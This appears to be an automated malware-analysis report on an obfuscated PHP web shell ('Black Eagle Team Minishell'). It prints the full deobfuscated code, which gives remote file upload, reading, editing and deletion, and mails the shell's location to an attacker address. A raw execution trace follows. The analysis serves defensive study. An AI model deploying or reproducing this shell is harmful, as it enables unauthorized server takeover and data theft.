PHP Malware Analysis

userzero.phtml

md5: db137fc1456c45c4c755a6583044be15

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title

URLs


Deobfuscated PHP code

<?php

/*
            By: MR.P4UL / Bo0G3yM4n
            IG: @blackeagleteam.id
            Mau Ngapain Cukk Mau Recode Yah!
            Eitss Tidak Bisa
*/
$p3mu14 = "ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs";
$arif = "=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";
eval /* PHPDeobfuscator eval output */ {
    /*
        Black Eagle Team Shell v2
        By : Bo0G3yM4n
        Thanks To : Black Eagle Team, Dark Clown Security
        Jangan Suka NgeRecode Klo Recode Kalian Ampas ;v
        Bypass 403 Forbidden / Auto Delete Shell / PHP Malware Detector / Minishell
    */
    set_time_limit(0);
    error_reporting(0);
    error_log(0);
    $sname = "Black Eagle Team Minishell";
    $__gcdir = "getcwd";
    $__fgetcon7s = "file_get_contents";
    $__scdir = "scandir";
    $rm__dir = "rmdir";
    $un__link = "unlink";
    if (get_magic_quotes_gpc()) {
        foreach ($_POST as $key => $value) {
            $_POST[$key] = stripslashes($value);
        }
    }
    echo '<!DOCTYPE html>
<html>
<head>
<meta name="robots" content"noindex. nofollow">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>' . $sname . '</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body>';
    echo '<div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>' . $sname . '</center></h1></div>';
    if (isset($_GET['path'])) {
        $path = $_GET['path'];
        chdir($_GET['path']);
    } else {
        $path = $__gcdir();
    }
    $path = str_replace("\\", "/", $path);
    $paths = explode("/", $path);
    echo "<table width=\"100%\" border=\"0\" align=\"center\" style=\"margin-top:-10px;\"><tr><td>";
    echo "<font style='font-size:13px;'>Path: ";
    foreach ($paths as $id => $pat) {
        echo "<a style='font-size:13px;' href='?path=";
        for ($i = 0; $i <= $id; $i++) {
            echo $paths[$i];
            if ($i != $id) {
                echo "/";
            }
        }
        echo "'>{$pat}</a>/";
    }
    echo "<br>[ <a href=\"?\">Home</a> ]</font></td><td align=\"center\" width=\"27%\"><form enctype=\"multipart/form-data\" method=\"POST\"><input type=\"file\" name=\"file\" style=\"color:#ef6c00;margin-bottom:4px;\"/><input type=\"submit\" value=\"Upload\" /></form></td></tr><tr><td colspan=\"2\">";
    if (isset($_FILES['file'])) {
        if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
            echo "<center><font color=\"#00ff00\">Upload Berhasil!!</font></center><br/>";
        } else {
            echo "<center><font color=\"red\">Upload Gagal!!</font></center><br/>";
        }
    }
    echo "</td></tr><tr><td></table><div class=\"table-div\"></div><input id=\"image\" type=\"hidden\">";
    echo "";
    if (isset($_GET['filesrc'])) {
        echo "<table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr><td>File: ";
        echo "" . basename($_GET['filesrc']);
        "";
        echo "</tr></td></table><br />";
        echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . "</textarea></center>";
    } elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
        echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
        if ($_POST['opt'] == 'rename') {
            if (isset($_POST['newname'])) {
                if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
                    echo "<center><font color=\"#00ff00\">Rename OK!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Rename Failed!</font></center><br />";
                }
                $_POST['name'] = $_POST['newname'];
            }
            echo '<form method="POST">New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" /> <input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="rename"><input type="submit" value="Save" /></form>';
        } elseif ($_POST['opt'] == 'edit') {
            if (isset($_POST['src'])) {
                $fp = fopen($_POST['path'], 'w');
                if (fwrite($fp, $_POST['src'])) {
                    echo "<center><font color=\"#00ff00\">Edit File OK!.</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Edit File Failed!.</font></center><br />";
                }
                fclose($fp);
            }
            echo '<form method="POST"><textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br /><input type="hidden" name="path" value="' . $_POST['path'] . '"><input type="hidden" name="opt" value="edit"><input type="submit" value="Save" /></form>';
        }
        echo "</center>";
    } else {
        echo "</table><br /><center>";
        if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
            if ($_POST['type'] == 'dir') {
                if ($rm__dir($_POST['path'])) {
                    echo "<center><font color=\"#00ff00\">Dir Deleted!</font></center><br />";
                } else {
                    echo "<center><font color=\"red\">Delete Dir Failed!</font></center><br />";
                }
            } elseif ($_POST['type'] == 'file') {
                if ($un__link($_POST['path'])) {
                    echo "<font color=\"#00ff00\">Delete File Done.</font><br />";
                } else {
                    echo "<font color=\"red\">Delete File Error.</font><br />";
                }
            }
        }
        echo "</center>";
        $_scdir = $__scdir($path);
        echo "<div id=\"content\"><table width=\"100%\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\"><tr class=\"first\"> <th><center>Name</center></th><th width=\"12%\"><center>Size</center></th><th width=\"10%\"><center>Permissions</center></th> <th width=\"15%\"><center>Last Update</center></th><th width=\"11%\"><center>Options</center></th></tr>";
        foreach ($_scdir as $dir) {
            if (!is_dir("{$path}/{$dir}") || $dir == '.' || $dir == '..') {
                continue;
            }
            echo "<tr><td>[D] <a href=\"?path={$path}/{$dir}\">{$dir}</a></td><td><center>--</center></td><td><center>";
            if (is_writable("{$path}/{$dir}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$dir}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$dir}");
            if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . "";
            echo "</center></td> <td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option></select><input type=\"hidden\" name=\"type\" value=\"dir\"><input type=\"hidden\" name=\"name\" value=\"{$dir}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$dir}\">&nbsp;<input type=\"submit\" value=\">>\" /></form></center></td></tr>";
        }
        foreach ($_scdir as $file) {
            if (!is_file("{$path}/{$file}")) {
                continue;
            }
            $size = filesize("{$path}/{$file}") / 1024;
            $size = round($size, 3);
            if ($size >= 1024) {
                $size = round($size / 1024, 2) . ' MB';
            } else {
                $size .= ' KB';
            }
            echo "<tr><td>[F] <a href=\"?filesrc={$path}/{$file}&path={$path}\">{$file}</a></td><td><center>" . $size . "</center></td><td><center>";
            if (is_writable("{$path}/{$file}")) {
                echo "<font color=\"#00ff00\">";
            } elseif (!is_readable("{$path}/{$file}")) {
                echo "<font color=\"red\">";
            }
            echo perms("{$path}/{$file}");
            if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) {
                echo "</font>";
            }
            echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . "";
            echo "</center></td><td><center><form method=\"POST\" action=\"?option&path={$path}\"><select name=\"opt\"><option value=\"\"></option><option value=\"delete\">Delete</option><option value=\"rename\">Rename</option><option value=\"edit\">Edit</option></select><input type=\"hidden\" name=\"type\" value=\"file\"><input type=\"hidden\" name=\"name\" value=\"{$file}\"><input type=\"hidden\" name=\"path\" value=\"{$path}/{$file}\">&nbsp;<input type=\"submit\" value=\">>\" /></form></center></td></tr>";
        }
        echo "</table></div>";
    }
    function perms($file)
    {
        $perms = fileperms($file);
        if (($perms & 0xc000) == 0xc000) {
            $info = 's';
        } elseif (($perms & 0xa000) == 0xa000) {
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            $info = 'p';
        } else {
            $info = 'u';
        }
        $info .= $perms & 0x100 ? 'r' : '-';
        $info .= $perms & 0x80 ? 'w' : '-';
        $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
        $info .= $perms & 0x20 ? 'r' : '-';
        $info .= $perms & 0x10 ? 'w' : '-';
        $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
        $info .= $perms & 0x4 ? 'r' : '-';
        $info .= $perms & 0x2 ? 'w' : '-';
        $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
        return $info;
    }
    echo "<br><center>&copy; <span id=\"footer\"></span> 2020 Black Eagle Team</center><br>";
    echo "</body></html><!-- EOF -->";
    @ini_set('output_buffering', 0);
    @ini_set('display_errors', 0);
    set_time_limit(0);
    ini_set('memory_limit', '64M');
    header('Content-Type: text/html; charset=UTF-8');
    $to = 'alfredofernandezbutar@gmail.com';
    $f31337 = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
    $fie = "Akses {$f31337} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
    mail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
};
exit;

Execution traces

data/traces/db137fc1456c45c4c755a6583044be15_trace-1676258413.8261.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:20:39.723937]
1	0	1	0.000157	393528
1	3	0	0.000234	398400	{main}	1		/var/www/html/uploads/userzero.phtml	0	0
1		A						/var/www/html/uploads/userzero.phtml	8	$p3mu14 = 'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
1		A						/var/www/html/uploads/userzero.phtml	9	$arif = '=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
2	4	0	0.000299	398400	base64_decode	0		/var/www/html/uploads/userzero.phtml	10	1	'ZXZhbCgiPz4iLmd6dW5jb21wcmVzcyhnenVuY29tcHJlc3MoZ3ppbmZsYXRlKGd6aW5mbGF0ZShnemluZmxhdGUoYmFzZTY0X2RlY29kZShzdHJyZXYoJGFyaWYpKSkpKSkpKTs'
2	4	1	0.000320	398592
2	4	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	5	0	0.000339	398560	urldecode	0		/var/www/html/uploads/userzero.phtml	10	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	5	1	0.000356	398720
2	5	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	6	0	0.000374	398528	htmlspecialchars_decode	0		/var/www/html/uploads/userzero.phtml	10	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	6	1	0.000391	398560
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'
2	7	0	0.000420	400952	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($arif))))))));'	/var/www/html/uploads/userzero.phtml	10	0
3	8	0	0.000437	400952	strrev	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'=wb+JvwdMZRM/UfOfx3IuBJOw0wJj7OJMQsLQ/+ouwny9xLDtTOE4mfGzXC6AFHqScMOc5aLJDUDKRP9kju/De/8YKI0GqPuhcIgtHbOlM/989ZL5uWvYRuLkTPqWLwiBciezWPc6Dje/P06/reutPDbqvvzO5ij+a4NXt/3r2/1GRvqmmJa6+DCSy/INqB1pdztqmQR4jDTn70PFI5FM+bzuWW0M7hOUmAnKnJVeucFPWJnY4H75mjDi2mxwBzzouoQrAQeGFS9vlBK8YxJjv9KeyGOBD4uoCvXn7cZEi6gq/L3h10lU7YPH2HC2SRpu8RUBY8pwFY4yIW8j2MgQerhkdOhihbU6P+vg2tf1YuiLTJj+/PpLTpX0R6HUdsQxXPTV8W2zcssm+Qp8PYqeYKxc7I9zTs/NoKHfdQS16/3SUvOxX6FFjW9wJS5ATEqgWcMS0qcKiW9SIr2J+0PtGVKn1sqlwV+iS1n0o0yHraJ8YvoT9s6hla5eoj4GWru'
3	8	1	0.000466	405080
3	8	R			'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
3	9	0	0.000494	405048	base64_decode	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'AdYLKfQB0Qsu9AHMCzP0eJwBwQs+9Hic1Vp7c9s2Ev/fM/4OCOqGcmuJesV29UqdWE5fdny20pmM5dFAJCQhpkiWhGI713732wX41sNyrr2Z08QhCewusK8fFiA7r/2Zv7tjfre7Q+D3xmHWHemzqcPJgLM5uZ5xxyGf61H3I2mRN171XePxvOnqtsGMuXchGXjYVWA/IKcsuCNvHe/eJdfcWgRCPmq2X5g7ZdC4uGPkYsqvuOXZnPzqeCS+ZY4AgpO5z0LS/hxPAJ5C0qw2yJkXjIVtc5eY5GQhPXLKHS55NGOTXP50Sc6Zc88CDl2SW9ILoPlcuCJEkt2d78zdnZDLkRRzPnLEXMhSdb+9u8ODwAtGAfe9QAp3mm10vOhxL3TZnBP96xJa1JySCqHpYBRZRqOpZYsgZhk+HB4pMrh5NXw4asK1AdcjuDYjhsmUS8tzj8KI4RD+foA/C3ki5lcTlJQKUc8g6BCvPBL8Kr0/akTCw+xswngqyFnT1IfI'
3	9	1	0.000531	409176
3	9	R			'\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3	10	0	0.000630	405048	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v)�\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\03'
3	10	1	0.000733	408152
3	10	R			'\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3	11	0	0.000831	404024	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v.�\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\0'
3	11	1	0.000926	407128
3	11	R			'\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
3	12	0	0.001023	404024	gzinflate	0		/var/www/html/uploads/userzero.phtml(10) : eval()'d code	1	1	'\001�\v3�x�\001�\v>�x��Z{s�6\022��3�\016\b�rk�z�v�J�XN_v|�ҙ���@$$!�H��b;�~��\005���r�����!\t�.��\037\026 ;�����c~��C��a�\035鳩�ɀ�9��q�!��Q�#i�7^�]������w!\031x�U`? �,�#o\035��%��Z\004B>j�_�;eи�c�bʯ��ٜ��x$�e�\000����B�\034O\000�BҬ6ș\027��ms���d!=r�\035.y4c�\\�tIΙs�\002\016]�[�\v��\\�"D�ݝ��ݝ�ˑ\024s>r�\\�Ru���Ã�\vF\001��@\nw�mt��q/tٜ\023��\022ZԜ�\n��`\024YF��e� f\031>\034\036)2�y5|8jµ\001�#�6#�ɔK�s�ˆ�\020�~�?\vy"�W\023��\nQ� �\020�<\022�*�?jD���l�x*�Y�ԇ���\b\024O0\037�r\032\034Ձ�V\02'
3	12	1	0.001116	407128
